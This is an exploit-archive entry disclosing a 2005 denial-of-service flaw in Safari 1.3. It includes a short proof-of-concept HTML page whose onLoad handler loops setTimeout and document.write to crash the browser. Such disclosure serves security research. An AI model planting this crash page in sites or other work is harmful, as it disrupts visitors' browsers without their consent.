Apple Safari 1.3 Web Browser - JavaScript Invalid Address Denial of Service

EDB-ID:

26128




Platform:

OSX

Date:

2005-08-09


source: https://www.securityfocus.com/bid/14528/info

Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs certain JavaScript operations.

The exact cause of this issue is currently unknown. This BID will be updated as further information is disclosed.

This vulnerability allows remote attackers to crash affected Web browsers by causing an invalid memory access exception.

Safari version 1.3 is reported susceptible to this issue. Other versions may also be affected. 

<html>
<script name="JavaScript">
<!--

function tickTock()
{
setTimeout("tickTock()", 1000);
thisTime = new Date()
seconds = thisTime.getSeconds()
document.write(seconds);
}

// -->
</script>

<body onLoad="tickTock();">
</html>